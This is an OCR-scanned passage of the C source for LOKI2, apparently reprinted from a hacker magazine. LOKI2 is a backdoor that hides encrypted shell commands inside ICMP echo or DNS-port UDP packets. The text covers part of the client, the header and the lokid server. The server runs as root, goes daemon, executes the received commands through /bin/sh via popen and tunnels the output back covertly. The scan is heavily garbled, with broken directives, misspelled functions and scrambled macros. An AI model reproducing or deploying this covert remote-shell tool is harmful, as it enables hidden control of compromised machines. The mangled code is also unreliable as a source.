i_check((u_short *)&sdg.ttype.udph, BUFSIZE + UDPH_SIZE); 
} 
sdg.iph.ip_v = 0x4; 
sdg.iph.ip_hl = 0x5; 
sdg.iph.ip_len = FIX_LEN(LOKIP_SIZE); 
sdg.iph.ip_ttl = 0x40; 
sdg.iph.ip_p = prot; 
sdg.iph.ip_dst = sin.sin_addr.s_addr; 
if ((sendto(ripsock, (struct loki *)&sdg, LOKIP_SIZE, (int)NULL, (struct sockaddr *) &s 
in, sizeof(sin)) < LOKIP_SIZE) ) 
{ 
if (verbose) perror("[non fatal] truncated write"); 
} 
} 
/* 
* help is here 
xf 
void help () 
{ 
fprintf(stderr," 
$s\t\t- you are here 
$s xx\t\t- change alarm timeout to xx seconds (minimum of $%d) 
$s\t\t- query loki server for client statistics 
$s\t\t- query loki server for all client statistics 
$s\t\t- swap the transport protocol ( UDP <-> ICMP ) [in beta] 
$s\t\t- quit the client 
$s\t\t- quit this client and kill all other clients (and the server) 
$s dest\t\t- proxy to another server [ UNIMPLIMENTED ] 
$s dest\t redirect to another client [ UNIMPLIMENTED ]\n", 
HELP, TIMER, MIN_TIMEOUT, STAT_C, STAT_ALL, SWAP_T, QUIT_C, QUIT_ALL, PROXY_D, REDIR_C) 
, 
} 
/* 
* parse escaped commands 
ey. 
int c_parse(u_char *buf, int *timer) 
{ 
cflags &= ~VALIDC; 
/* help */ 
if ('strncmp (buf, HELP, sizeof(HELP) - 1) || buf[1] == ’?7’) 
{ 
help (); 
return (NOK); 
} 
/* change alarm timer */ 
else if (!strncemp (buf, TIMER, sizeof(TIMER) - 1)) 
{ 
cflags |= VALIDC; 
(*timer) = atoi(&buf[sizeof (TIMER) - 1]) > MIN_TIMEOUT ? atoi(&buf[sizeof (TIMER) —- 
1)) MIN_TIMEOUT; 
fprintf(stderr, "\nloki: Alarm timer changed to %d seconds.", *timer); 
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return (NOK); 
} 
/* Quit client, send notice to server */ 
else i (!strnemp (buf, QUIT_C, sizeof (QUIT_C) - 1)) 
cflags |= (TERMINATE | VALIDC); 
/* Quit client, send kill to server */ 
else if (!strncemp (buf, QUIT_ALL, sizeof (QUIT_ALL) - 1)) 
cflags |= (TERMINATE | VALIDC); 
/* Request server-side statistics */ 
else if (!strncemp (buf, STAT_C, sizeof (STAT_C) - 1)) 
cflags |= VALIDC; 
/* Swap transport protocols */ 
else if (!strncemp (buf, SWAP_T, sizeof (SWAP_T) - 1)) 
{ 
/* When using strong crypto we do not 
* want to swap protocols. 
ei 
ifdef STRONG_CRYPTO 
fprintf(stderr, C_MSG_NOSWAP) ; 
return (NOK); 
elif '(. linux__) 
fprintf(stderr, "\nloki: protocol swapping only supported in Linux\n"); 
return (NOK); 
else 
cflags |= (NEWTRANS | VALIDC); 
endif 
} 
/* Request server to redirect output 
* to another LOKI client 
x / 
else if (!strncmp (buf, REDIR_C, sizeof(REDIR_C) - 1)) 
cflags |= (REDIRECT | VALIDC); 
/* Request server to simply proxy 
* requests to another LOKI server 
af. 
else if (!strncemp (buf, PROXY_D, sizeof (PROXY_D) - 1)) 
cflags |= (PROXY | VALIDC); 
/* Bad command trap */ 
if (!(cflags & VALIDC) ) 
{ 
fprintf(stderr, "Unrecognized command %s\n",buf); 
return (NOK); 
} 
return (OK); 
} 
/* 
* Dumps packets read by client... 
ey 


void packets_read() 
{ 
fprintf(stderr, "Packets read: 


} 


/* EOF */ 
<--> loki.c 
<++> L2/loki.h 


ifndef LOKI H _ 
define _ LOKI_H _ 
/* 


* LOKI 


* 


S$ld\n", p_read); 
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* loki header file 


* 
* 


Af 


Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 


Pep pe pe pe pe pe pe pe pe pe ee ee ee 


Nc 


lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 


ude 
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1996/7 Guild Corporation Productions [daemon9] 


<stdio.h> 
<stdlib.h> 
<string.h> 
<signal.h> 
<pwd.h> 
<unistd.h> 
<netinet/in.h> 
<arpa/inet.h> 
<netdb.h> 
<sys/socket.h> 
<sys/ioctl.h> 
<sys/stat.h> 
<sys/wait.h> 
<fcntl.h> 
<time.h> 
<grp.h> 
<termios.h> 
<sys/ipce.h> 
<sys/sem.h> 
<sys/shm.h> 
<setjmp.h> 


fdef LINUX 


<linux/icmp.h> 


lude 


<linux/ip.h> 


He He Be P- 


lude 


<linux/signal.h> 


Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 
Nc 


Rn a ee ee ee oe ee 


QOQoaacnceca. 


Nc 
Nc 
Nc 
Nc 
Nc 
nc 


ee ae ee ee 


ndef 
ndef 
efine 
efine 
ndif 


/* BSDish nomenclature 
ip iphdr 
ip_v version 
ip_hl ihl 
ip_len tot_len 
ip_ttl ttl 
ip_p protocol 
ip_dst daddr 
ip_sre saddr 


fdef BSD4 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 


<netinet/in_systm.h> 
<netinet/ip_var.h> 
<netinet/ip.h> 
<netinet/tcp.h> 
<netinet/tcpip.h> 
<netinet/ip_icmp.h> 
<netinet/icmp_var.h> 
<sys/sockio.h> 
<sys/termios.h> 
<sys/signal.h> 


icmp_id 
icmp_seq 
ip_dst ip_dst.s_addr 
ip_srce ip_src.s_addr 


fdef SOLARIS 
lude 
lude 
lude 
lude 
lude 
lude 


<netinet/in_systm.h> 
<netinet/in.h> 
<netinet/ip_var.h> 
<netinet/ip.h> 
<netinet/tcp.h> 
<netinet/tcpip.h> 


i. 
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nclude <netinet/ip_icmp.h> 
nclude <netinet/icmp_var.h> 
nclude <sys/sockio.h> 
nclude <sys/termios.h> 
nclude <sys/signal.h> 
nclude <strings.h> 

nclude <unistd.h> 


ee ee ee 


undef icmp_id 

undef icmp_seg 

define ip_dst ip_dst.s_addr 
define ip_srce ip_src.s_addr 
#endif 

ifdef BROKEN_IP_LEN 

define FIX_LEN(n) (x) /* FreeBSD needs this */ 
else 

define FIX_LEN(n) htons (n) 
endif 
/* 


* Net/3 will not pass ICMP_ECHO packets to user processes. 


ifdef NET3 

define D_P_TYPE ICMP_ECHO 
define C_P_TYPE ICMP_ECHOREPLY 
else 

define D_P_TYP ICMP_ECHOREPLY 


He 


define C_P_TYP 
endif 


ICMP_ECHO 


ifdef STRONG_CRYPTO 

include "/usr/local/ssl/include/blowfish.h" 
include "/usr/local/ssl/include/bn.h" 
#include "/usr/local/ssl/include/dh.h" 
include "/usr/local/ssl/include/buffer.h" 


define BF_KEYSIZE 16 /* blowfish key in bytes 

define IVEC_SIZE 7 /* I grabbed this outta thin air. 
define BN2BIN_SIZI 48 /* bn2bin byte-size of 384-bit prime 
endif 


Gl 


ifde 
defi 
endi 
ifde 
defi 
endi 
ifde 
defi 
endi 


STRONG_CRYPTO 
e CRYPTO_TYPE "blowfish" 


WEAK_CRYPTO 
RYPTO_TYPE "XOR" 


0) 
Q 
vs) 
Ke 
td 
e 
K 
ae) 
7 


"none" 


rh D hm S hy DS eh 
(0) 
Q 


/* Start user configurable options */ 


/* End user configurable options */ 


#define VERSION W220 


#define 


BUFSIZE 0x38 


W 


/* We build packets with a fixed payload. 


define MIN_TIMEOUT 3 /* minimum client-side alarm timeout 

define MAX_RETRAN 3 /* maximum client-side timeout/retry amount 
define MAX CLIENT Oxa /* maximum server-side client count 

#define KEY _TIMER Oxel0 /* maximum server-side idle client TTL 
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* Fine for ICMP_ECHO/ECHOREPLY packets as they 
* often default to a 56 byte payload. However 
* DNS query/reply packets have no set size and 
* are generally oddly sized with no padding. 
nif 

define ICMPH_SIZE 8 

define UDPH_SIZE 8 

define NL_PORT htons (0x35) 

define PROMPT "loki> " 

define ENCR 1 /* symbolic for encrypt ay 

#define DECR 0 /* symbolic for decrypt * / 

define NOCR 1 /* don’t encrypt this packet xy 

define OKCR ) /* encrypt this packet */ 

define OK /* Positive acknowledgement *y 

define NOK 0 /* Negative acknowledgement * / 

define NNOK =] /* Really negative acknowledgement */ 

define FIND 1 /* Controls locate_client a/, 

define DESTROY 2 /* disposition ey, 


/* LOKI packet type symbolics */ 


define L_TAG Oxf001 /* Tags packets as LOKI * / 
define L_PK_REQ Oxal /* Public Key request packet */ 
define L_PK_REPLY Oxa2 /* Public Key reply packet * / 
define L_EOK Oxa3 /* Encrypted ok ey 
define L_REQ Oxbl /* Standard reugest packet * / 
define L_REPLY Oxb2 /* Standard reply packet ua, 
define L_ERR Oxcl /* Error of some kind */ 
define L_ACK Oxdl /* Acknowledgement ia 
define L_QUIT Oxd2 /* Receiver should exit ei 
define L_EOT Oxfl /* End Of Transmission packet Ao 


/* Packet type printing macro */ 


#ifdef DEBUG 


#define PACKET_TYPE(ldg) \ 

\ 

it (ldg.payload[0 == Oxal) fprintf(stderr, "Public Key Request"); \ 
else if (ldg.payload[0 == 0Oxa2) fprintf(stderr, "Public Key Reply"); \ 
else if (ldg.payload[0 == 0Oxa3) fprintf(stderr, "Encrypted OK"); \ 
else if (ldg.payload[0 == Oxbl) fprintf(stderr, "Client Request"); \ 
else if (ldg.payload[0 == Oxb2) fprintf(stderr, "Server Reply"); \ 
else if (ldg.payload[0 == Oxcl) fprintf(stderr, "Error"); \ 
else if (ldg.payload[0 == QOxdl) fprintf(stderr, "ACK"); \ 
else if (ldg.payload[0 == Qxd2) fprintf(stderr, "QUIT"); \ 
else if (ldg.payload[0 == Oxfl) fprintf(stderr, "Server EOT"); \ 
else fprintf(stderr, "Unknown") ; \ 
if (prot == IPPROTO_ICMP) fprintf(stderr, ", ICMP type: %d\n", ldg.ttype.icmph.icm 
p_type) ;\ 
else fprintf(stderr, "\n");\ 

#define DUMP_PACKET(ldg, i) \ 

\ 

for (i = 0; i < BUFSIZE; itt) fprintf(stderr, "Ox%x ",ldg.payload[i]); \ 
fprintf(stderr, "\n");\ 

#endif 

/* 

* Escaped commands (not interpreted by the shell) 

*/ 

#define HELP "/help" /* Help me */ 
#define TIMER "/timer" /* Change the client side timer */ 
#define QUIT_C "/quit" /* Quit the client af 
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define QUIT_ALL "/quit all" /* Kill all clients and server */ 

define STAT_C Wiestat" /* Stat the client Re/, 

define STAT_ALL "/stat all" /* Stat all the clients if 

define SWAP_T "/swapt" /* Swap protocols ay 

define REDIR_C "/redirect" /* Redirect to another client */ 

define PROXY_D "/proxy" /* Proxy to another server af 

/* 

* Control flag symbolics 

*/ 

define TERMINATE 0x01 

#define TRAP 0x02 

define VALIDC 0x04 

define VALIDP 0x08 

define NEWTRANS 0x10 

define REDIRECT 0x20 

define PROXY 0x40 

define SENDKILL 0x80 
/* 

* Message Strings 

* L_ == common to both server and client 

* S_ == specific to server 

* C_== specific to client 

xf 

define L_MSG_BANNER "\nLOKI2\troute [(c) 1997 guild corporation worldwide] \n" 
define L_MSG_NOPRIV "\n[fatal] invalid user identification value" 

define L_MSG_SOCKE "(fatal] socket allocation error" 

define L_MSG_ICMPONLY "\nICMP protocol only with strong cryptography\n" 
define L_MSG_ATEXI "[fatal] cannot register with atexit(2)" 

define L_MSG_DHKEYGEN "generating Diffie-Hellman parameters and keypair" 
define L_MSG_DHKGFAIL "\n[fatal] Diffie-Hellman key generation failure\n" 
define L_MSG_SIGALRM "[fatal] cannot catch SIGALRM" 
#define L_MSG_SIGUSR1 "[fatal] cannot catch SIGUSR1" 

define L_MSG_SIGCHLD "([fatal] cannot catch SIGCHLD" 

define L_MSG_WIERDERR "\n[SUPER fatal] control should NEVER fall here\n" 
define S_MSG_PACKED "\nlokid: server is currently at capacity. Try again later\n" 
define S_MSG_UNKNOWN "\nlokid: cannot locate client entry in database\n" 
define S_MSG_UNSUP "\nlokid: unsupported or unknown command string\n" 
define S_MSG_ICMPONLY "\nlokid: ICMP protocol only with strong cryptography\n" 
define S_MSG_CLIENTK "\nlokid: clean exit (killed at client request) \n" 
define S_MSG_DUP "\nlokid: duplicate client entry found, updating\n" 
define S_MSG_USAGE "\nlokid -p (ilu) [ -v (0/1) ]\n" 

define C_MSG_USAGE "\nloki -d dest -p (ilu) -v (O|1) ] [— -t (m>3) J\n" 
define C_MSG_TIMEOUT "\nloki: no response from server (expired timer) \n" 
define C_MSG_NOSWAP "\nloki: cannot swap protocols with strong crypto\n" 
define C_MSG_PKREQ "loki: requesting public from server\n" 

define C_MSG_PKREC "loki: received public key, computing shared secret\n" 
define C_MSG_SKSET "loki: extracting and setting expanded blowfish key\n" 
define C_MSG_MUSTQUIT "\nloki: received termination directive from server\n" 
/* 


*/ 


/* 


* 


at 


#define IS_GOOD_ITYPE 


\ 


(i_check((u_short *)&ldg.ttype.icmph, BUFSIZE 
ldg.ttype.icmph.icmp_type 


Macros to eval 


These are UGLY. 


ICMP_1] 


ECHO client packet check 


C(1dg) \ 


+ ICMPH_SIZE 


luate packets to determine if they are LOKI or not. 


D_P_TYPE 
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ldg.ttype.icmph.icmp_id 


ldg.ttype. 


* ICMP_ECHO daemon packet check 


*/ 


#define IS_GOOD_ITYPE 


\ 


(i_check((u_short *)&ldg.ttype.icmph, BUFSIZE 


/* 


D(ldg) \ 


icmph.icmp_seq 
ldg.payload[0] 
ldg.payload 
ldg.payload 
ldg.payload 
ldg.payload 


ma 


+ ICMPH_SIZE) 


ldg.ttype.icmph.icmp_type 


ldg.ttype. 


* UDP client packet check 


if. 


#define IS_GOOD_UTYPE 


C (1dg) \ 


\ 


(i_check((u_short *)&ldg.ttype.udph, BUFSIZE 
ldg.ttype.udph.uh_sport 
ldg.ttype 


/* 


* UDP daemon packet check. 


*/ 


#define IS_GOOD_UTYPE 


— 


ldg.payload[0] 
ldg.payload[ 
ldg.payload[ 
ldg.payload[ 


icmph.icmp_seq 
ldg.payload[0] 
ldg.payload[0] 
ldg.payload[0] 


a 


+ UDPH_SIZ!I 


{| 
~~ 


udph.uh_dport 


Yikes 


D(ldg) \ 


\ 


(i_check((u_short *)&ldg.ttype.udph, BUFSIZE 
ldg.ttype.udph.uh_dport 


/* 


W 


n 


ma 


d more info here 


+ UDPH_SIZE) 


ldg.payload[0] 
ldg.payload[0] 


* TICMP_ECHO / ICMP_ECHOREPLY header prototype 


*/ 


struct icmp_echo 


{ 


u_char icmp_type; ae 
u_char icmp_code; i 
u_short icmp_cksum; hess 
u_short icmp_id; ae 
u_short icmp_seq; fe 


}; 


/* 


* UDP header prototype 


* fi 


struct udp 
{ 


u_short uh_sport; 
u_short uh_dport; 


NM NMNF FP 


byte 
byte 
byte 
byte 


type 

code 

checksum 
identification 


byt 


sequence number 


/* 2 byte source port 
/* 2 byte destination port 


—— loki_id &&\ 
—— Th TAG &EN\ 
== , REPLY ||\ 
== I PK REPLY ||/\ 
_EOT | I/\ 
L_QUIT ||\ 
== L_ERR)) ==\ 
(1) 2? (1) : (O)\ 
0 &&\ 
a C_P_TYPE &&\ 
— L TAG &&\ 
== L_REQ |1/\ 
L_QUIT ||\ 
== L PK _REQ)) == 
(1) ? (1) : (0)\ 
0 &&\ 
NL_PORT &&\ 
loki_id &&\ 
REPLY ||\ 
L_EOT ||\ 
L_QUIT ||\ 
L_ERR)) ==\ 
(1) (1) : (0)\ 
0 &&\ 
NL_PORT &&\ 
L_QUIT ||\ 
L_REQ)) == 
(1) (1) : (0)\ 
x 
«7 
*/ 
A 
* / 
x 
Ki 
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u_short uh_ulen; 
u_short uh_sum; 


i 


/* 
* LOKI packet prototype 
*/ 


struct loki 
{ 
struct ip iph; 
union 
{ 
struct icmp_echo icmph; 
struct udp udph; 
}ttype; 
u_char payload[BUFSIZE]; 


}; 


Gl 


#define 
#define 


LOKIP_SIZ! 
LP_DST 


void blur(int, int, u_char *); 
char *host_lookup(u_long) ; 


u_long name_resolve(char *); /* human readabl > network byte 

u_short i_check(u_short *, int); /* Ah yes, the IP family checksum 

int c_parse(u_char *, int *); /* parse escaped commands [client] 

void d_parse(u_char *, pid_t, int); /* parse escaped commands [server] 
/* build and transmit LOKI packets 

void loki_xmit (u_char *, u_short, int, struct sockaddr_in, int); 

int lokid_xmit (u_char *, u_long, int, int); 

void err_exit(int, int, int, char *); /* handle exit with reason 

void clean_exit (int); /* exit cleanly 

void help(); /* lala 

void shadow(); /* daemonizing routine 

void swap_t (int); /* swap protocols [server-side] 

void reaper (int); /* prevent zombies 

void catch_timeout (int); /* ALARM signal catcher 

void client_expiry_check (); /* expire client from shm 

void prep_shm(); /* Prepare shm ans semaphore 

void dump_shm(); /* detach shm 

void packets_read(); /* packets read (client) 

void fd_status(int, int); /* dumps fd stats 

#ifdef PTY 

int ptym_open(char *); 

int ptys_open(int, char *); 

pid_t pty_fork(int *, char *, struct termios *, struct winsize *); 

endif 

ifdef STRONG_CRYPTO 
DH* generate_dh_keypair(); /* generate DH params and keypair 
u_char *extract_bf_key(u_char *, int); /* extract and md5 and set bf key 


endif 


endif /* __LOKI_H_ */ 
<--> loki.h 

<++> L2/lokid.c 

/* 


LOKI2 


[ lokid.c ] 


+ + F F F 


Wy] oki cht 
"client_db.h" 


include 
include 


/* 2 byte length 
/* 2 byte checksum 


Vas 


/* 
/* 


/* 
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27 


+i} 
cf: 


IP header ey 
ICMP header */ 
UDP header * / 
data payload */ 


sizeof (struct loki) 
rdg.iph.ip_srce 


/* 
/* 


1996/7 Guild Corporation Worldwide 


Symmetric encryption function 
network byte -> human readable 


[daemon9] 


AY 
#f 
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#include "shm.h" 
jmp_buf env; /* holds our stack frame */ 
struct loki sdg, rdg; /* LOKI packets te 
time_t uptime = 0; /* server uptime ee 
u_long b_sent = 0, p_sent = 0; /* bytes / packets written */ 
u_short c_id = 0; /* client id tof 
int destroy_shm = NOK; /* Used to mark whether or not 
* a process should destroy the 
* shm segment upon exiting. 
*/ 
int verbose = OK, prot = IPPROTO_ICMP, ripsock = 0, tsock = 0; 
#ifdef STRONG_CRYPTO 
extern u_char user_key[BF_KEYSIZE]; 
extern BF_KEY bf_key; 
extern u_short ivec_salt; 
DH *dh_keypair = NULL; /* DH public and private key */ 
endif 
ifdef PTY 
int mfd = 0; /* master PTY file descriptor */ 
endif 
int main(int argc, char *argv[]) 
static int one = 1, c = 0, cflags = 0; 
u_char bufl[BUFSIZE] = {0}; 
pid_t pid = 0; 
ifdef STRONG_CRYPTO 
static int c_ind = -l1; 
endif 
ifdef POPEN 
FILE *Jjob = NULL; 
char buf2[BUFSIZE] = {0} 
#endif 
/* ensure we have proper permissions */ 
if (geteuid() || getuid()) err_exit(0, 1, 1, L_MSG_NOPRIV) ; 


while ((c = getopt (argc, 


{ 


switch (c) 


{ 


argv, "v:ip:")) != EOF) 


case 'v': /* change verbosity */ 
verbose = atoi(optarg); 
break; 
case 'p’: /* choose transport protocol */ 


switch (optarg[0]) 


{ 


case ‘i 


ae 


prot = IP 
break; 


case 'u 


I. 


prot = IP 
break; 


default 


/* ICMP_ECHO / ICMP_ECHOREPLY */ 
PROTO_ICMP; 


/* DNS query / reply */ 
PROTO_UDP; 


err_exit(1, 0, 1, "Unknown transport\n"); 


} 


break; 


default: 
err_exit (0, 
} 
} 


0, iy 


if ((tsock = socket (AF_INET, 


S_MSG_USAGE) ; 


SOCK_RAW, prot)) < 0) 
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err_exit(1l, 1, 1, L_MSG_SOCKET) ; 


ifdef STRONG_CRYPTO /* ICMP only with strong crypto */ 
if (prot != IPPROTO_ICMP) err_exit(0, 0, 1, L_MSG_ICMPONLY) ; 
else 


/* Child will signal parent if a 
* transport protcol switch is 
* required 


KY 
if (signal(SIGUSR1, swap_t) == SIG_ERR) 
err_exit(l, 1, verbose, L_MSG_SIGUSR1); 
#endi 
if ((ripsock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 


err_exit(1, 1, 1, L_MSG_SOCKET) ; 


ifdef DEBUG 
fprintf(stderr, "\nRaw IP socket: "); 
fd_status(ripsock, OK); 
endif 
ifdef IP_HDRINCL 
if (setsockopt (ripsock, IPPROTO_IP, IP_HDRINCL, é&one, sizeof(one)) < 0) 
if (verbose) perror("Cannot set IP_HDRINCL socket option"); 
endif 


/* power up shared memory segment and 
* semaphore, register dump_shm to be 
* called upon exit 


ay A 
prep_shm(); 
if (atexit (dump_shm) == -1) err_exit(1, 1, verbose, L_MSG_ATEXIT); 
fprintf(stderr, L_MSG_BANNER) ; 
time (&uptime) ; /* server uptime timer */ 


#ifdef STRONG _CRYPTO 
/* Generate DH parameters */ 
(verbose) fprintf(stderr, "\nlokid: %s", L_MSG_DHKEYGEN) ; 
(! (dh_keypair = generate_dh_keypair())) 
err_exit(l, 0, verbose, L_MSG_DHKGFAIL); 
(verbose) fprintf(stderr, "\nlokid: done.\n"); 


Fy Fh 


i 


Fy Fh 


endi 
ifndef DEBUG 
shadow (); /* go daemon */ 
endif 
destroy_shm = OK; /* if this process exits at any point 
* from hereafter, mark shm as destroyed 
*/ 
/* Every KEY_TIMER seconds, we should 
* check the client_key list and see 
* if any entries have been idle long 
* enough to expire them. 
*/ 
if (signal(SIGALRM, client_expiry_check) == SIG_ERR) 


err_exit(l, 1, verbose, L_MSG_SIGALRM) ; 
alarm (KEY_TIMER) ; 


if (signal(SIGCHLD, reaper) == SIG_ERR) 
err_exit(l, 1, verbose, L_MSG_ SIGCHLD) ; 


cflags &= ~VALIDP; /* Blocking read */ 
c = read(tsock, (struct loki *)&rdg, LOKIP_SIZE); 


switch (prot) 
{ /* Is this a valid Loki packet? */ 
case IPPROTO_ICMP: 
if ((IS_GOOD_ITYPE_D(rdg) ) ) 
{ 
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cflags |= VALIDP; 
c_id = rdg.ttype.icmph.icmp_id; 
} 


break; 


case IPPROTO_UDP: 
if ((IS_GOOD_UTYPE_D(rdg) ) ) 
{ 


E 


cflags |= VALIDP; 
c_id = rdg.ttype.udph.uh_sport; 
} 
break; 
default: 
err_exit(l, 0, verbose, L_MSG_WIERDERR) ; 
} 
if (cflags & VALIDP) 
{ 
#ifdef DEBUG 
fprintf(stderr, "\n[DEBUG]\t\tlokid: packet read %d bytes, type: ", c); 
PACKET_TYPE (rdg) ; 
DUMP_PACKET (rdg, c); 
#fendif 
switch (pid = fork()) 


{ 
case 0: 
destroy_shm = NOK; /* child should NOT mark segment as 
* destroyed when exiting... 
of 
/* TLI seems to have problems in 


* passing socket file desciptors around 
*/ 


#ifdef SOLARIS 

close (ripsock) ; 

if ((ripsock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 
err_exit(l, 1, 1, L_MSG_SOCKET) ; 


#ifdef DEBUG 


fprintf(stderr, "\nRaw IP socket: "); 
fd_status(ripsock, OK); 


endif /* DEBUG */ 
endif /* SOLARIS */ 


break; 
default: /* parent will loop forever spawning 
* children if we do not zero rdg 
*/ 


bzero((struct loki *)&rdg, LOKIP_SIZI 
cflags &= ~VALIDP; 
continue; 


Gl 


i 


case -l: /* fork error */ 
err_exit(1l, 1, verbose, "[{fatal] forking error"); 


} 
#ifdef STRONG_CRYPTO 


/* preliminary evaluation of the pkt 


*S O'S if we have a request for the 
* servers public key 
ia 
if (rdg.payload[0] == L_PK_REQ) 
{ 
if (verbose) 
{ 
fprintf(stderr, "\nlokid: public key submission and request : %s <%d> " 


, host_lookup(rdg.iph.ip_dst), c_id); 
fprintf(stderr, "\nlokid: computing shared secret"); 


} 
DH_compute_key(bufl, (void *)BN_bin2bn(&rdg.payload[1], BN2BIN_SIZE, NULL), 


dh_keypair); 
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if (verbose) fprintf(stderr, "\nlokid: extracting 128-bit blowfish key"); 


/* Try to add client to client list */ 


if (((c = add_client (extract_bf_key (bufl, NOK))) == -1)) 
{ 
else 
if (((c = add_client ((u_char *)NULL)) == -1)) 
{ 
endif /* MAX CLIENT limit reached */ 
lokid_xmit (S_MSG_ PACKED, LP_DST, L_ERR, NOCR); 


lokid_xmit (buf1l, LP_DST, L_EOT, NOCR); 
err_exit(l1, 0, verbose, "\nlokid: Cannot add key\n"); 


} 


#ifdef STRONG_CRYPTO 

if (verbose) 

{ 
fprintf(stderr, "\nlokid: client <%d> added to list [%d]", c_id, 
fprintf(stderr, "\nlokid: submiting my public key to client"); 

} /* send our public key to the client */ 

bzero((u_char *)bufl, BUFSIZE); 

BN_bn2bin((BIGNUM *)dh_keypair -> pub_key, bufl); 


lokid_xmit (bufl, LP_DST, L_PK_REPLY, NOCR); 


lokid_xmit (bufl, LP_DST, L_EOT, NOCR); 
clean_exit (0); 


} 
bzero((u_char *)bufl, BUFSIZE); 
/* Control falls here when we hav 
* a regular request packet. 


*/ 
if ((c_ind = locate_client (FIND)) == -1) 
{ /* Cannot locate the client’s entry */ 


lokid_xmit (S_MSG_UNKNOWN, LP_DST, L_ERR, NOCR); 
lokid_xmit (bufl, LP_DST, L_EOT, NOCR); 

err_exit(l, 0, verbose, S_MSG_ UNKNOWN) ; 
} /* set expanded blowfish key */ 
lse BF_set_key(&bf_key, BF_KEYSIZE, user_key); 


endif 

/* unload payload */ 
bcopy (&rdg.payload[1], bufl, BUFSIZE - 1); 

ifdef STRONG_CRYPTO 


/* The IV salt is incremented in the 
* client prior to encryption, ergo 
* the server should increment before 
* decrypting 


af 
ivec_salt = update_client_salt (c_ind) ; 
#fendif 
blur (DECR, BUFSIZE - 1, bufl); 
/* parse escaped command */ 
if (buf1[0] == '/’) d_parse(bufl, pid, ripsock); 
#ifdef POPEN /* popen the shell command and execute 
* it inside of /bin/sh 
* / 
if (!(job = popen(bufl, "r"))) 


err_exit(1, 1, verbose, "\nlokid: popen") ; 


while (fgets (buf2, BUFSIZE - 1, job)) 
{ 


bcopy (buf2, bufl, BUFSIZE); 
lokid_xmit (buf1, LP_DST, L_REPLY, OKCR); 


} 

lokid_xmit (bufl, LP_DST, L_EOT, OKCR)j; 
ifdef STRONG_CRYPTO 

update_client(c_ind, p_sent, b_sent); 


else 


update_client (locate_client (FIND), p_sent, b_sent); 


endif 


6.txt Wed Apr 26 09:43:42 2017 32 


clean_exit (0); /* exit the child after sending 
* the last packet 
xf 
endif 
ifdef PTY /* Not implemented yet */ 
fprintf(stderr, "\nmfd: %d", mfd); 
endif 
} 
} 
} 
/* 
* Build and transmit Loki packets (server-side version) 
*/ 
int lokid_xmit (u_char *payload, u_long dst, int ptype, int crypt_flag) 
{ 
struct sockaddr_in sin; 
int i = 0; 
bzero((struct loki *)&sdg, LOKIP_SIZE) ; 
sin.sin_family = AF_INET; 
sin.sin_addr.s_addr = dst; 
sdg.payload[0] = ptype; /* set packet type */ 
/* Do not encrypt error or public 
* key reply packets 
*/ 
if (crypt_flag == OKCR) blur(ENCR, BUFSIZE - 1, payload); 
bcopy (payload, &sdg.payload[1], BUFSIZE - 1); 
if (prot == IPPROTO_ICMP) 
{ 
ifdef NET3 /* Our workaround. 
sdg.ttype.icmph.icmp_type = ICMP_ECHO; 
#else 
sdg.ttype.icmph.icmp_type = ICMP_ECHOREPLY; 
endif 
sdg.ttype.icmph.icmp_code = (int) NULL; 
sdg.ttype.icmph.icmp_id = c_id; /* Client ID */ 
sdg.ttype.icmph.icmp_seq = L_TAG; /* Loki ID */ 
sdg.ttype.icmph.icmp_cksum = 
i_check((u_short *)&sdg.ttype.icmph, BUFSIZE + ICMPH_SIZE); 
} 
if (prot == IPPROTO_UDP) 
{ 
sdg.ttype.udph.uh_sport = NL_PORT; 
sdg.ttype.udph.uh_dport = rdg.ttype.udph.uh_sport; 
sdg.ttype.udph.uh_ulen = htons (UDPH_SIZE + BUFSIZE); 
sdg.ttype.udph.uh_sum = 
i_check((u_short *)&sdg.ttype.udph, BUFSIZE + UDPH_SIZE); 
} 
sdg.iph.ip_v = 0x4; 
sdg.iph.ip_hl = 0x5; 
sdg.iph.ip_len = FIX_LEN(LOKIP_SIZE) ; 
sdg.iph.ip_ttl = 0x40; 
sdg.iph.ip_p = prot; 
sdg.iph.ip_dst = sin.sin_addr.s_addr; 
#ifdef SEND_PAUSE 
usleep (SEND_PAUSE) ; 
#fendif 
if ((i = sendto(ripsock, (struct loki *)&sdg, LOKIP_SIZE, (int)NULL, 
)&sin, sizeof(sin))) < LOKIP_SIZE) 


{ 


if (verbose) perror("[non fatal] truncated write"); 


} 


tf, 


(struct sockaddr * 
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else 
{ 
b_sent 
p_sent 
} 


return 


((i 


/* 


* Parse escaped commands 


*/ 
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/* Update global stats */ 


/* Make snocrash happy 


(return bytes written, 


* or return 0 if there was an error) 


Af 


(server-sid 


version) 


<$d> s\n", 


void d_parse(u_char *buf, pid_t pid, int ripsock) 
{ 
u_char buf2[4 * BUFSIZE] = {0}; 
int n = 0, m= 0; 
u_long client_ip = 0; 
/* client request for an all kill */ 
if (!strncemp (buf, QUIT_ALL, sizeof (QUIT_ALL) - 1)) 
{ 
if (verbose) fprintf(stderr, "\nlokid: 
while (n < MAX_CLIENT) 
{ 
if ((client_ip = check_client_ip(n++, &c_id))) 
{ 
if (verbose) fprintf(stderr, "\tsending L_QUIT: 


up (client_ip) ); 


ntry 


lokid_xmit (buf, client_ip, L_QUIT, NOCR); 
} 
} 
if (verbose) fprintf(stderr, S_MSG_CLIENTK) ; 
/* send a SIGKILL to all the processes 
* in the servers group... 
xf 
if ((kill(-pid, SIGKILL)) == -1) 
err_exit(l, 1, verbose, "[fatal] could not signal process group"); 
clean_exit (0); 
} 
/* client is exited, remov 
* from the client list 
*/ 
if ('strncemp (buf, QUIT_C, sizeof(QUIT_C) - 1)) 
{ 
if ((m = locate_client (DESTROY)) == -1) 
err_exit(l, 0, verbose, S_MSG_ UNKNOWN) ; 
else if (verbose) fprintf(stderr, "\nlokid: client <%d> freed from list 
, ™); 
clean_exit (0); 
} 
/* stat request */ 
if ('strncemp (buf, STAT_C, sizeof (STAT_C) - 1)) 


